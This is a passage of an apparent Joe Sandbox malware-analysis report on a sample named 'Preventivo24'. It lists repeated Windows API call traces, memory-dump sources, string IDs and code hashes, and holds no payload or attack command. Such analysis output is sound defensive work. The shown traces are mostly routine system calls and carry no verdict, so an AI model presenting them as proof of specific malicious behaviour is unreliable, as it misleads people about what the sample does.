                                                                                • Part of subcall function 00FA4450: MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,?,-00000001), ref: 00FA449A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$ObjectSingleWait
                                                                              • String ID: *.*$.jar$.pack
                                                                              • API String ID: 3339361032-3892993289
                                                                              • Opcode ID: 1b94830c7c4c6843e506ccd86170a754882c0f58951054ca9105e724862842f5
                                                                              • Instruction ID: c41b04813056f53e9f3daa143a00e8d6c0c8ddfed226b26dc8bc917d5b2be593
                                                                              • Opcode Fuzzy Hash: 1b94830c7c4c6843e506ccd86170a754882c0f58951054ca9105e724862842f5
                                                                              • Instruction Fuzzy Hash: 1E618370E006098FEB15DFA8C894B9EBBF5FF48324F14816AE825A73C1DB349941CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • LoadLibraryW.KERNEL32(combase.dll,RoOriginateLanguageException), ref: 00E92AE4
                                                                              • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00E92AEA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: RoOriginateLanguageException$combase.dll
                                                                              • API String ID: 2574300362-3996158991
                                                                              • Opcode ID: 2f2264656e7b94664508827c0ccf5561a99cdc43fe6021d31e64ebb9f47bcc6c
                                                                              • Instruction ID: cb712daae7d2bb0f663b3b42ad8629aa79477b93472693be3db20f14277eae9b
                                                                              • Opcode Fuzzy Hash: 2f2264656e7b94664508827c0ccf5561a99cdc43fe6021d31e64ebb9f47bcc6c
                                                                              • Instruction Fuzzy Hash: B831567190121AAFCF25DFA4C855BEEBBF4FB04754F10022AE961B72C0E7755A44CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00F99580: GetProcAddress.KERNEL32(SetWindowTheme), ref: 00F9964D
                                                                                • Part of subcall function 00F99580: SendMessageW.USER32(?,00001036,00010000,00010000), ref: 00F99698
                                                                              • CreateWindowExW.USER32(80000000,SysListView32,?,00000000,?,80000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F99022
                                                                              • SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 00F9903A
                                                                              • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00F99046
                                                                                • Part of subcall function 00E9A370: SetWindowLongW.USER32(?,000000FC,00000000), ref: 00E9A3B2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$AddressCreateLongProc
                                                                              • String ID: SysListView32
                                                                              • API String ID: 5470851-78025650
                                                                              • Opcode ID: d3994f9dd5dbbd0ddef1c1e5427efa7dfe42e717a50b67626e24f13c67261ee7
                                                                              • Instruction ID: c4d865d78e503277a3b796c7468667f233809fb32af877459e512d61cfe31244
                                                                              • Opcode Fuzzy Hash: d3994f9dd5dbbd0ddef1c1e5427efa7dfe42e717a50b67626e24f13c67261ee7
                                                                              • Instruction Fuzzy Hash: B9117C31306210BFD6299B25CC05F5BFBA9FF89750F054619FA05A7290C7B1A940CB95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 0108AB55: AcquireSRWLockExclusive.KERNEL32(011CE928,?,?,?,00E8B4A6,011CF53C,B5580983,?,?,010B207D,000000FF,?,01003A5D,B5580983,?), ref: 0108AB60
                                                                                • Part of subcall function 0108AB55: ReleaseSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B4A6,011CF53C,B5580983,?,?,010B207D,000000FF,?,01003A5D,B5580983,?), ref: 0108AB9A
                                                                              • LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr), ref: 00FC659E
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00FC65A5
                                                                                • Part of subcall function 0108AB04: AcquireSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B517,011CF53C,01115440), ref: 0108AB0E
                                                                                • Part of subcall function 0108AB04: ReleaseSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B517,011CF53C,01115440), ref: 0108AB41
                                                                                • Part of subcall function 0108AB04: WakeAllConditionVariable.KERNEL32(011CE924,?,?,00E8B517,011CF53C,01115440), ref: 0108AB4C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ExclusiveLock$AcquireRelease$AddressConditionLibraryLoadProcVariableWake
                                                                              • String ID: Dbghelp.dll$SymFromAddr
                                                                              • API String ID: 1702099962-642441706
                                                                              • Opcode ID: eacf30db0b9e2d1b4f9e693f346f5e257a5f636af7334f29888f33140943060f
                                                                              • Instruction ID: 81117fdf1aaa6ee82ba550842e8f281f9816c0ad0d9a94a034a4e5b79a6f1f62
                                                                              • Opcode Fuzzy Hash: eacf30db0b9e2d1b4f9e693f346f5e257a5f636af7334f29888f33140943060f
                                                                              • Instruction Fuzzy Hash: A8019AB1A49B05EFCB68CF68EA46B49B7B6E708B21F140739E83197784D73468408F11
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,0108F30D,?,?,00000000,?,?,?,0108F437,00000002,FlsGetValue,0113CCF8,FlsGetValue), ref: 0108F369
                                                                              • GetLastError.KERNEL32(?,0108F30D,?,?,00000000,?,?,?,0108F437,00000002,FlsGetValue,0113CCF8,FlsGetValue,?,?,0108C22B), ref: 0108F373
                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 0108F39B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad$ErrorLast
                                                                              • String ID: api-ms-
                                                                              • API String ID: 3177248105-2084034818
                                                                              • Opcode ID: 8a446a86d71f58519449c7f522dc1dea23a28d13a1942ecdc1eddd037071f5d3
                                                                              • Instruction ID: ea34ae738c85b41f7fc12e2adbb29c3da3873d311c02e8ea13ffe49b9a9b364d
                                                                              • Opcode Fuzzy Hash: 8a446a86d71f58519449c7f522dc1dea23a28d13a1942ecdc1eddd037071f5d3
                                                                              • Instruction Fuzzy Hash: 18E0DF3028430AFBEF612E72EC06B693E99AB00B44F10C070FACDB81D1D76296509A90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 00EAD6CD
                                                                              • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 00EAD6E6
                                                                                • Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA
                                                                                • Part of subcall function 00F990D0: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,?,?,?,00000000,?,00EAD728,?,80004005,?), ref: 00F99157
                                                                                • Part of subcall function 00F990D0: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F99191
                                                                              • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00EAD823
                                                                              • SendMessageW.USER32(?,00001061,00000000,00000005), ref: 00EAD91F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$AllocateHeapWindow
                                                                              • String ID:
                                                                              • API String ID: 3168177373-0
                                                                              • Opcode ID: 50e9f7f49717560f2d38c3cbdf398bbab7798f6f66dbc0b0e39b51014fb30fef
                                                                              • Instruction ID: bbf0a7472c03bfcec432295ddc8e677863dd82fb41002c55541d95b399206ba1
                                                                              • Opcode Fuzzy Hash: 50e9f7f49717560f2d38c3cbdf398bbab7798f6f66dbc0b0e39b51014fb30fef
                                                                              • Instruction Fuzzy Hash: 99D17D71A006099FDB18DFA8C985BEEFBB5FF49314F104219E426BB280DB75A944CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 00E983D8
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00E9842C
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00E9844E
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00E985E0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: String$Free$Alloc
                                                                              • String ID:
                                                                              • API String ID: 986138563-0
                                                                              • Opcode ID: 65209dc5b82fddbda186234444abdd677795e95af6a4954348d848ccd9a4d9fe
                                                                              • Instruction ID: 192fffcd62de85d45d740e3b97f914bbfebac9344e5f3517887ec567e3f1099a
                                                                              • Opcode Fuzzy Hash: 65209dc5b82fddbda186234444abdd677795e95af6a4954348d848ccd9a4d9fe
                                                                              • Instruction Fuzzy Hash: FAB15D71A0021A9FDF14DF64C944BAEBBB8FF49714F104169E925E7390DB34AE05CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00E9E42A
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00E9E470
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: FreeString
                                                                              • String ID:
                                                                              • API String ID: 3341692771-0
                                                                              • Opcode ID: 27bca952c73d74bf39fb0778ba8960b7b2cb64747ff910550d4e4e56a2f70f1e
                                                                              • Instruction ID: 91a97cf9ce840126b2ec1d47a5be696c48da99eea787e029fb8f3b52af8586fa
                                                                              • Opcode Fuzzy Hash: 27bca952c73d74bf39fb0778ba8960b7b2cb64747ff910550d4e4e56a2f70f1e
                                                                              • Instruction Fuzzy Hash: 5E71F671A04219EFDB14DF64DC44BAEB7B8FB08724F00412AE915E7390EB769D00CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • DeleteCriticalSection.KERNEL32(011D003C,B5580983,011C63B8,0093A190,?,011D002C,011C63B8,010B1F80,000000FF,?,00FA866F), ref: 00FA84B2
                                                                              • EnterCriticalSection.KERNEL32(011D001C,B5580983), ref: 00FA852F
                                                                              • DestroyWindow.USER32(00000000), ref: 00FA854D
                                                                              • LeaveCriticalSection.KERNEL32(011D001C), ref: 00FA8596
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$DeleteDestroyEnterLeaveWindow
                                                                              • String ID:
                                                                              • API String ID: 307358592-0
                                                                              • Opcode ID: 0476a1a29ce731e460b1ac60bf8476caaed6f69c133d0b30a642ac8a460dbc5a
                                                                              • Instruction ID: c9d828f44acdec9cb283cc48c1d18a915b22573d8c0d08f7ec5625f567b9a40b
                                                                              • Opcode Fuzzy Hash: 0476a1a29ce731e460b1ac60bf8476caaed6f69c133d0b30a642ac8a460dbc5a
                                                                              • Instruction Fuzzy Hash: 9971E3B1E01201DFDB24DF54D848B5ABBB9FF49760F184129EC25AB784DBB4AC45CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00FDBE52,00000000,?,00000000,00000000,?,00000000,?,?,?,00FDBE52,?,00000003), ref: 00FE13BD
                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,00FDBE52,?,00000003,00000009,B5580983,00000000), ref: 00FE13CE
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00FDBE52,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00FE13EF
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00FDBE52,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00FE1441
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1717984340-0
                                                                              • Opcode ID: ad27a64912770f7e06af16f24743bb57339f79a123c7c2fca94ac1266f280341
                                                                              • Instruction ID: ce5f8392b9d386778f68b0eae705c49d92aef7f35781bc0e23c79e18a6f96f3d
                                                                              • Opcode Fuzzy Hash: ad27a64912770f7e06af16f24743bb57339f79a123c7c2fca94ac1266f280341
                                                                              • Instruction Fuzzy Hash: 34514972A00385FBDB209BA79C41F6BB299FF45310F244639F949E62C0EB76D840A755
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • VariantClear.OLEAUT32(?), ref: 00EA1B39
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00EA1B50
                                                                              • VariantClear.OLEAUT32(?), ref: 00EA1B6C
                                                                              • VariantClear.OLEAUT32(?), ref: 00EA1BA1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant$AllocString
                                                                              • String ID:
                                                                              • API String ID: 2502263055-0
                                                                              • Opcode ID: 536d11ecb71c0cdceceb28fdf554e524084ed0caa90cf6dd1069d58087b3b07b
                                                                              • Instruction ID: eead2b0c20b5b1fe599d18df495ff8861f0a82c630371c5ac49d0fcd5454768f
                                                                              • Opcode Fuzzy Hash: 536d11ecb71c0cdceceb28fdf554e524084ed0caa90cf6dd1069d58087b3b07b
                                                                              • Instruction Fuzzy Hash: 6E518FB1A05259DFCB20DF28C841B99B7F4FF4D314F1455E9E919EB240EB35AD808B98
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetShortPathNameW.KERNEL32(?,00000000,00000000), ref: 00FD60A2
                                                                              • GetShortPathNameW.KERNEL32(?,?,?), ref: 00FD6121
                                                                              • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00FD6171
                                                                              • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,-00000001,00000000,00000000), ref: 00FD61A7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
